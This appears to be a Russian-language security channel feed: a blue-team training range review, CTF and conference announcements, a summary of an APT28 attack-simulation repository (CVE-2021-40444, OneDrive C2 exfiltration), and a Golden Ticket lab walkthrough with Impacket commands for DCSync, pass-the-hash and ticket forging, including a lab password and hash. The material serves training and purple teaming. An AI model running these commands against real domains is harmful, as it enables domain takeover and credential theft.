?‍? Долгожданный полигон для синих! ?‍?
Я уже успел порешать несколько кейсов оттуда и могу поделиться небольшим фидбеком.

Определённо круто, что теперь у всех желающих есть возможность поработать с передовыми средствами мониторинга. На полигоне представлены:
1) MP SIEM ?
2) PT NAD ?
3) PT AF ?
Этого набора более чем хватает для расследования задач, представленных на платформе.
Доступ прост и понятен; подробная инструкция, описывающая все необходимые шаги для подключения, также приложена.

Задания нескольких уровней сложности, и в некоторых из них нужно прям постараться найти узел, о котором говориться в описании к задаче.
Также есть вопросы к формулировкам самих кейсов, и с первого раза может быть не совсем понятно, о чём идёт речь (по одному я уже успел завести обращение в поддержку).

В общем и целом — выглядит круто и определенно заслуживает внимания. Самое время прокачать свои навыки и вспомнить то, чему вас учили в SOCе?

? WE. ARE. LIVE. ? Good luck to all the participants❤️ game.tqlctf.com

? WE. ARE. LIVE. ?

Good luck to all the participants❤️

game.tqlctf.com

Знакомимся с ~~DOOM~~ DOM Invader, или как найти DOM-XSS на Habr во время написания статьи ?

Сегодня поговорим про инструмент DOM Invader, узнаем некоторые причины появления DOM-уязвимостей и проанализируем несколько примеров уязвимого JavaScript-кода ?️

Также вы узнаете, какой потенциальный импакт можно показывать команде BugBounty для получения выплаты за Client-Side уязвимость ?

Подробнее

Хабр

Осваиваем DOM Invader: ищем DOM XSS и Prototype Pollution на примере пяти лабораторных и одной уязвимости на Хабре

Привет, Хабр! Сегодня мы познакомимся с DOM XSS и Prototype Pollution, рассмотрим примеры уязвимостей на Bug Bounty и научимся использовать инструмент DOM Invader, который заметно упростит поиск таких...

Анализ TTPs APT группировок на основе TI отчетов, а также разработка и тестирование атомарных тест-кейсов для реализуемых сценариев всегда занимает определенное время на этапе подготовки к проведению Purple Teaming. Поэтому мы всегда стараемся сначала найти нормальную аналитику с техническими подробностями, без маркетинговой воды и "highly sophisticated" формулировок? Недавно мне на глаза попался очень полезный репозиторий, который хотелось бы порекомендовать в этой заметке.

Автор детально разбирает отчеты и публикует готовый план и необходимые инструменты для проведения симуляции сценария в формате Purple Teaming.
На примере последнего - Fancy Bear APT28 Adversary Simulation:

? Create dll downloads files through base64, This is to download two files the first is (dfsvc.dll) the second is (Stager.dll)
? Exploiting CVE-2021-40444 to inject the DLL file into Word File and create an execution for DLL by opening Word File
? Word File is running and the actual payload is downloaded through DLLDownloader.dll and we have two files Stager.dll and dfsvc.dll
? The Stager decrypts the actual payload and runs it which in turn is responsible for command and control
? Data exfiltration over OneDrive API C2. This integrates OneDrive API functionality to facilitate communication between the compromised system and the attacker-controlled server thereby potentially hiding the traffic within legitimate OneDrive communication
? Get Command and Control through payload uses the OneDrive API to upload data including command output to OneDrive, the payload calculates the CRC32 checksum of the MachineGuid and includes it in the communication with the server for identification purposes

В итоге получается готовый сценарий, который можно кастомизировать и использовать для проведения Purple Teaming.

GitHub

GitHub - S3N4T0R-0X0/APT28-Adversary-Simulation: This is a simulation of attack by Fancy Bear group (APT28) targeting high-ranking…

This is a simulation of attack by Fancy Bear group (APT28) targeting high-ranking government officials Western Asia and Eastern Europe - S3N4T0R-0X0/APT28-Adversary-Simulation

?Немного о Golden Ticket?

Изучая ресурсы по типу HackTricks, вы могли неоднократно увидеть способ выдачи и использования золотого билета при помощи ticketer.py из набора Impacket?‍?:

python3 ticketer.py \-aesKey $krbtgtAESkey \-domain\-sid $domainSID \-domain $DOMAIN randomuser

Но выпустив себе билет таким образом, при попытке его использования вы увидите следующую ошибку:

[\-] Kerberos SessionError: KDC\_ERR\_TGT\_REVOKED(TGT has been revoked)

О чем говорит эта ошибка? Билет был отозван? Но мы же только что его выпустили!

Вся причина в том, что кто-то не следит за патч-ноутами. С ноября 2021 года компания Microsoft начала распространять обновление KB5008380, которое вводилось в несколько этапов. Его целью была нейтрализация серьезной уязвимости CVE-2021-42287, которая позволяла атакующему без особых усилий олицетворять контроллеры домена, злоупотребляя Privilege Attribute Certificate (PAC) Kerberos?️

Для тех, кто не в теме:
Privilege Attribute Certificate (PAC) — это компонент, используемый в протоколе аутентификации Kerberos, который хранит дополнительную информацию об авторизации пользователя и прикрепляется к билету Kerberos, предоставляя подробную информацию о членстве пользователя в группах, привилегиях и других атрибутах, связанных с безопасностью.

Возвращаясь к патчу, Microsoft обновила PAC, добавив две новые структуры данных: PAC_ATTRIBUTES_INFO и PAC_REQUESTOR. Наиболее интересной частью патча является новая проверка, представленная структурой PAC_REQUESTOR. С её появлением KDC проверяет имя пользователя (клиента) в билете, который разрешается в SID, включенный в PAC. Поэтому с октября 2022 года любой билет без новой структуры PAC (или билет для несуществующего пользователя) будет отклонен. Естественно, если обновление установлено.
В этом и кроется суть ошибки, которую мы могли наблюдать выше.

Вместе с обновлением подход к созданию золотых билетов тоже изменился. Мы не можем выпустить Golden Ticket для произвольного пользователя, но можем воспользоваться существующим!
Для начала обновите Impacket!

apt install python3\-impacket

После обновления выпустить золотой билет можно следующей командой:

python3 ticketer.py \-aesKey $krbtgtAESkey \-domain\-sid $domainSID \-domain $DOMAIN \-user\-id 1000 validuser

При этом обратная совместимость со старым PAC так же останется:

python3 ticketer.py \-nthash $krbtgtRC4key \-domain\-sid $domainSID \-domain $DOMAIN \-old\-pac username

Практический пример использования Golden Ticket на примере уже разобранной мной лабораторной Kingdom с платформы Codeby.Games:

```
# Получаем SID домена:
impacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4

# Делаем DCSync, получаем ключи учетки krbtgt:
impacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt

# Осуществляем RID-брутфорс для получения пар RID+user (тут я внезапно использовал Pass-the-Hash):
crackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute

# Выпускаем золотой билет:
impacket-ticketer -aesKey
c8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova

# Добавляем запись в /etc/hosts, потому что Kerberos работает с именами служб:
echo '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts

# Используем smbexec с созданным золотым билетом:
export KRB5CCNAME=amaslova.ccache
impacket-smbexec codeby.cdb/[email protected] -k -no-pass
```

Результат можно увидеть на приложенных к посту (ниже) скриншотах. На первом из них видна попытка выпустить билет на несуществующего пользователя, а на втором — успешное использование золотого билета, выпущенного для непривилегированной учетной записи amaslova!

??? 29 МАРТА: ЛЕКЦИИ И МАСТЕР-КЛАССЫ ОТ ВЕДУЩИХ СПЕЦИАЛИСТОВ ПО КИБЕРБЕЗОПАСНОСТИ! ??? Не пропустите уникальную возможность узнать о последних трендах и методах обеспечения безопасности данных от экспертов отрасли! ? Расписание мероприятий: 10:00 – 10:30…

??? 29 МАРТА: ЛЕКЦИИ И МАСТЕР-КЛАССЫ ОТ ВЕДУЩИХ СПЕЦИАЛИСТОВ ПО КИБЕРБЕЗОПАСНОСТИ! ???

Не пропустите уникальную возможность узнать о последних трендах и методах обеспечения безопасности данных от экспертов отрасли!

? Расписание мероприятий:

10:00 – 10:30 ? Доклад: “CTF в реальной жизни”
– Павел Шлюндин
эксперт управления тестирования на проникновение и киберучений Crosstech Solutions Group

10:30 – 11:30 ??‍? Мастер-класс: “Reverse Fashion Week”
– Стародубов Максим
старший вирусный аналитик АО "Лаборатория Касперского"

11:30 – 12:00 ? Доклад: “Типовые методы удаленного проникновения злоумышленника”
– Костомаха Иван
старший специалист отдела экспертного обучения ESC Positive Technologies.

12:00 – 12:30 ? Доклад: “Обзор методов и средств обеспечения защищенности критически важных объектов”
– Литвин Игорь
специалист отдела экспертного обучения ESC Positive Technologies.

12:30 - 14:00 ??‍? Мастер-класс. "Анализ вредоносного трафика при атаках на корпоративную инфраструктуру"
- Садыков Ильдар
руководитель отдела экспертного обучения ESC Positive Technologies.

14:30 - 15:30 ??‍? Мастер-класс. "Attacktive Directory: знакомимся с базовыми атаками на доменные инфраструктуры"
- Аникеев Никита
исследователь АО "Перспективный мониторинг".

15:30 - 16:00 ? Доклад. "Путь багхантера"
- Петр Уваров
эксперт багбаунти VK.

16:30 - 18:00 ??‍? Дискуссия. Куда пойти работать кибербезнику на ДВ?
Модератор - Павлычев Алексей Викторович - директор ЦИБ ДВФУ.
Участники:
◾️Перспективный мониторинг
◽️Positive technologies
◾️Crosstech Solutions Group
◽️DNS
◾️Вконтакте
◽️Акцент
◾️Информационный центр.

• Для студентов ДВФУ ИМиКТ дополнительный бонус, официальное отсвобождение от занятий.

** Для участия в лекциях необходимо пройти регистрацию

*Для тех, кто хочет, но не может прийти будет подготовленна прямая трансляция в канале